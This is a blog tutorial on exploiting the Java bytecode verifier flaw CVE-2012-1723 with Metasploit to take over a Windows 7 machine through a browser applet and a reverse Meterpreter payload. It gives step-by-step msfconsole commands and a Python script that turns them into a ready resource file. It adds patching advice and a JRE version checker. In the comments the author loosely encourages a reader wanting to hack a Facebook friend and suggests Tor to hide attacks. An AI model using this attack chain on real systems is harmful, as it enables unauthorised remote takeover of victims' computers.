Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)


Type : Tutorial

Level : Medium

Victim O.S : Windows 7 Ultimate

Attacker O.S : Backtrack 5 R2 with Metasploit Framework v4

CVE : 2012-1723

Credits : Stefan Cornellius (discoverer), mihi (vulnerability analysis), littlelightlittlefire (Metasploit module), juan vazquez and sinn3r (merged the overlapping code)

I first saw this Java Bytecode Verifier Remote Code Execution exploit about 5-6 days ago on the Exploit Database website. It is a very nice exploit 😛 and carries Metasploit's Excellent ranking. Here is the description copied from the exploit module:

This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

In other words, the applet abuses the resulting type confusion to obtain references it should never hold, switches off the sandbox checks, and then loads the rest of the exploit with full privileges. The exploit was published on July 11, 2012, so it is still fresh 🙂. The interesting part is that it is a multi-platform exploit: it targets the JRE rather than the operating system, so it is not limited to one OS (I only tried it against Windows 7). If you try it on another OS, e.g. Linux or Mac, please leave a comment saying whether it worked.

Requirements :

1. Metasploit Framework with the java_verifier_field_access exploit module

2. You can download the exploit here: http://www.exploit-db.com/exploits/19717/

Step by Step :

Attacker IP Address : 192.168.8.91

Victim IP Address : 192.168.8.90

1. Open your terminal (CTRL+ALT+T) and start the Metasploit Framework console (msfconsole).

2. Select the Java Bytecode Verifier Remote Code Execution exploit module (see image below).

[screenshot]

3. Next, set up the payload that will run if the victim executes the exploit. Because this is a Java exploit, the payload will also be a Java payload, but first list the payloads that are compatible with the module (show payloads).

[screenshot]

As shown in the picture above, I use java/meterpreter/reverse_tcp as the payload.

4. After the payload is set, configure the exploit options to suit your environment. To see the available options, run the show options command (or see the picture below).

[screenshot]

Information :

set srvhost 192.168.8.91 --> the address the exploit web server listens on; it must be an address of the attacker machine.

set srvport 80 --> the exploit server port. Because the exploit is delivered through the browser, I use port 80, the default web server port. Binding a port below 1024 requires msfconsole to run as root, and the port must not already be taken by another job: if it is, exploit fails with Rex::AddressInUse, so check with jobs -l and stop the old job with jobs -k <id>.

set uripath "" --> I did not choose a specific URI. With an empty URIPATH the module serves at the root, so the victim only needs to open the bare IP address.

set lhost 192.168.8.91 --> the local (attacker) IP address the payload connects back to once the exploit succeeds.

set lport 443 --> the local (attacker) port on which you want to catch the connection from the victim.

exploit --> run the exploit (start the web server and the payload handler).

5. When the victim opens our malicious URL (http://192.168.8.91) in their browser, this is what the console shows:

[screenshot]

I ran the sessions -l command to list the active sessions, and there was one active session.

6. The last step is to interact with the available session using sessions -i 1 (because the session ID was 1). Here is the screenshot after the exploit succeeded:

[screenshot]

pwned…
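
The steps above, collected into one repeatable resource script plus a pre-flight check of the listener addresses. This is an added example, not code from the original post or from Metasploit; it assumes the module's path in Metasploit is exploit/multi/browser/java_verifier_field_access (the module published as exploit-db 19717) and reuses the tutorial's addresses and ports. The bind check reproduces the Rex::AddressInUse condition that several commenters hit, before msfconsole runs into it.

```python
"""Render the msfconsole steps as a resource script and pre-check the listeners.

Added example for this tutorial; not code from the original post or from
Metasploit. Assumes the module path below and the tutorial's addresses/ports.
The output file name verifier.rc is arbitrary.
"""
import errno
import socket
from pathlib import Path
from typing import Dict, List, Optional

MODULE = "exploit/multi/browser/java_verifier_field_access"   # assumed module path
PAYLOAD = "java/meterpreter/reverse_tcp"

# The values typed in steps 3 and 4 of the tutorial.
TUTORIAL_OPTIONS: Dict[str, str] = {
    "SRVHOST": "192.168.8.91",
    "SRVPORT": "80",
    "URIPATH": "",            # empty URIPATH -> module serves at "/", so the bare IP works
    "LHOST": "192.168.8.91",
    "LPORT": "443",
}


def render_rc(options: Dict[str, str], module: str = MODULE, payload: str = PAYLOAD) -> str:
    """Return the msfconsole commands of steps 2-4 as a resource script, one per line."""
    lines = [f"use {module}", f"set PAYLOAD {payload}"]
    for name, value in options.items():
        # An empty value must be quoted, otherwise `set URIPATH` only prints the option.
        lines.append(f'set {name} "{value}"' if value == "" else f"set {name} {value}")
    lines.append("exploit -j")    # background job, so `sessions -l` stays usable
    return "\n".join(lines) + "\n"


def bind_problem(host: str, port: int) -> Optional[str]:
    """Explain why msfconsole could not listen on host:port, or None if it can.

    A listener already on the port is the Rex::AddressInUse error from the comments;
    a host that is not a local interface address is the other common SRVHOST mistake.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.bind((host, port))
        except OSError as e:
            if e.errno == errno.EADDRINUSE:
                return f"{host}:{port} is already in use (stop the old job with `jobs -k`)"
            if e.errno == errno.EACCES:
                return f"port {port} is privileged; run msfconsole as root"
            return f"cannot bind {host}:{port}: {e.strerror}"
    return None


def check_options(options: Dict[str, str]) -> List[str]:
    """Collect every listener problem for SRVHOST:SRVPORT and LHOST:LPORT."""
    problems: List[str] = []
    for host_key, port_key in (("SRVHOST", "SRVPORT"), ("LHOST", "LPORT")):
        port = int(options[port_key])
        if not 1 <= port <= 65535:
            problems.append(f"{port_key}={port} is out of range")
            continue
        msg = bind_problem(options[host_key], port)
        if msg:
            problems.append(msg)
    return problems


def write_rc(path: Path, options: Dict[str, str] = TUTORIAL_OPTIONS) -> Path:
    """Write the script; load it with `msfconsole -q -r <path>`."""
    path.write_text(render_rc(options))
    return path


if __name__ == "__main__":
    for problem in check_options(TUTORIAL_OPTIONS):
        print("warning:", problem)
    out = write_rc(Path("verifier.rc"))
    print(f"wrote {out}:\n{out.read_text()}")
```

Run it once on the attacker machine to write verifier.rc, then start msfconsole -q -r verifier.rc; the exploit -j at the end backgrounds the server so sessions -l and sessions -i 1 work exactly as in steps 5 and 6. Because the check actually binds SRVHOST:SRVPORT and LHOST:LPORT, it also warns when those addresses are not on the attacker machine or when port 80 needs root.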

Countermeasures :

1. Update your JRE to the latest version. Oracle fixed this vulnerability in the June 2012 Java SE Critical Patch Update (Java 7 Update 5 and Java 6 Update 33); Java 7u4, 6u32, 5u35 and 1.4.2_37 and earlier are affected.

2. Disable or remove the Java browser plug-in on machines that do not need it. This is a client-side attack: it only works when the browser hands the applet to a vulnerable JRE.
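
As an added check (my example, not part of the original post), the following Python parses a java -version banner and reports whether the JRE sits in the affected range quoted from the CVE description in the comments below (7u4, 6u32, 5u35 and 1.4.2_37 and earlier). The sample banners are constructed, and Oracle's 1.x update numbering (1.7.0_04 = Java 7 update 4) is assumed; vendor builds that renumber releases are not handled.

```python
"""Flag JRE builds in the CVE-2012-1723 affected range from a `java -version` banner.

Added example for this tutorial, not part of the original post or the Metasploit
module. Assumes Oracle's update numbering; sample banners below are constructed.
"""
import re
import subprocess
from typing import List, Optional, Tuple

# Last affected update per Java family, from the CVE description:
# 7u4, 6u32, 5u35 and 1.4.2_37 (and earlier); 7u5 / 6u33 carry the fix.
LAST_VULNERABLE_UPDATE = {7: 4, 6: 32, 5: 35, 4: 37}

# Accepts the legacy form 1.<family>.<patch>_<update> and the JDK 9+ form
# <family>.<interim>.<update>; "openjdk version" banners match as well.
_VERSION_RE = re.compile(r'version\s+"(\d+)(?:\.(\d+))?(?:\.(\d+))?(?:_(\d+))?')

# Constructed sample banners (not captured from real hosts) for the demo below.
SAMPLE_BANNERS: List[str] = [
    'java version "1.7.0_04"',
    'java version "1.7.0_05"',
    'java version "1.6.0_32"',
    'java version "1.4.2_37"',
    'openjdk version "11.0.2" 2019-01-15',
]


def parse_java_version(banner: str) -> Optional[Tuple[int, int]]:
    """Return (family, update): "1.7.0_04" -> (7, 4), "1.4.2_37" -> (4, 37), "11.0.2" -> (11, 2)."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch, update = [int(g) if g is not None else 0 for g in m.groups()]
    if major == 1:               # legacy numbering: the family is the second field
        return minor, update
    return major, patch          # 9+ numbering: the update is the third field


def is_affected(banner: str) -> bool:
    """True if the banner's JRE is at or below the last vulnerable update of its family."""
    parsed = parse_java_version(banner)
    if parsed is None:
        return False
    family, update = parsed
    limit = LAST_VULNERABLE_UPDATE.get(family)
    return limit is not None and update <= limit


def local_java_banner() -> Optional[str]:
    """Run `java -version` on this host (it prints to stderr); None if java is missing."""
    try:
        proc = subprocess.run(["java", "-version"], capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return proc.stderr or proc.stdout


def report(banners: List[str]) -> List[Tuple[str, bool]]:
    """Pair each banner with its verdict."""
    return [(b, is_affected(b)) for b in banners]


if __name__ == "__main__":
    local = local_java_banner()
    for banner, vulnerable in report([local] if local else SAMPLE_BANNERS):
        print(("VULNERABLE " if vulnerable else "ok         ") + banner.splitlines()[0])
```

Run without arguments it checks the local JRE and falls back to the constructed samples when no java is installed; feed it banners collected from an inventory tool to find the machines that still need the update.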

Hope it's useful 🙂


Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com


  • mehdi

    [-] Exploit failed: Rex::AddressInUse The address is already in use (192.168.1.3:80).

    what is this?

    • v4L

      #mehdi
      Maybe you already have an exploit server running that uses the same port on the same address.

      • ~rk

        How do I stop that 'already running server'?

  • annonymous

    Nice tutorial, but can I hack with it outside the network? For example, I want to hack a friend on my Facebook.

    • v4L

      #annonymous
      Yes and no… as long as you understand the logic of this attack the answer is yes, and vice versa if you don't.

  • annonymous

    It stops like this, what's wrong?

    [*] 192.168.1.4 java_verifier_field_access – Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
    [*] 192.168.1.4 java_verifier_field_access – Generated jar to drop (5482 bytes).
    [*] 192.168.1.4 java_verifier_field_access – Sending jar
    [*] 192.168.1.4 java_verifier_field_access – Sending jar
    [*] 192.168.1.4 java_verifier_field_access – Sending jar

    • v4L

      #annonymous
      What about the Java version on the victim machine? You can find old JREs here: http://oldapps.com

  • Well, Vishnu brother, which version of Java are you actually using? Because the session is not being created; only the jar is being sent…

    Kindly reply to me as soon as possible.

    • v4L

      #alive
      Sorry I only just replied to your comment; here are the details:
      Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier

      • alive

        Well, Vishnu brother, I have applied all these updates but it doesn't work at all. The "sending jar… sending jar…" shows up, but no session is being created.

        What could be the basic problem?

        • v4L

          #alive
          You can try oldapps.com to find older versions of the JRE there.

  • Russell

    Hi! First of all, thanks for every tutorial you have given us! I think you are the BEST!! 🙂 I have a problem: when I type exploit, I get this error:

    Exploit exception: No such file or directory – /opt/metasploit/msf3/data/exploits/CVE-2012-1723.jar

    What is wrong, please? Thanks!

    • v4L

      #Russell
      It looks like you don't have the exploit library.
      What if you run the msfupdate command first?

  • alive

    I have tried versions 4 and 5, but still only the jar files; no session has been created.

  • curtis

    I tried on 4 different PCs… it only works on 1. There were no sessions on the others. Why? Is it that they are not vulnerable, or do these exploits not work on most computers anymore?

    • v4L

      #curtis
      Maybe the other computers have antivirus / firewall enabled.

  • Rahul

    How do I hide my IP address during penetration testing if I use a USB dongle GSM SIM modem? Tell me how I mask my IP address and perform a Metasploit attack.

    In the above article, if the victim opens my article, can he also access the attacker computer?

    • v4L

      #Rahul
      You can use Tor or an anonymous proxy for that.

  • Rahul

    The Tor IP address is also dynamic; how will Tor forward data to me after the attack?

  • Darkmist

    Hi, the link you put is no longer working; would you mind posting another link to download it?

    • v4L

      #Darkmist
      The link is still there and working.

  • bali

    Hi, if the PHP version of my website is not updated, is it possible to do that attack?

    • v4L

      #bali
      It has no relation to PHP; this is a client-side attack via the Java Runtime.

    • bali

      Hi sir, I run my server but the URL is not working; I checked it in my other VMware window.
      I scanned my site and it shows a high vulnerability because my PHP version is not updated.
      How can a hacker take advantage of it?
      And thanks for the reply.

      • v4L

        #bali
        It depends on which vulnerability you've already found. Usually from this kind of vulnerability the attacker can own your system. You can also Google the vulnerability you found + patch availability.

  • Akash

    Hello sir
    Error: Rex::AddressInUse The address is already in use
    I have also checked for any exploit server running, but in vain. Can you please give me a command that can stop any running exploit server? It is blocked after I ran the java_signed_applet exploit.
    Thank you for your help.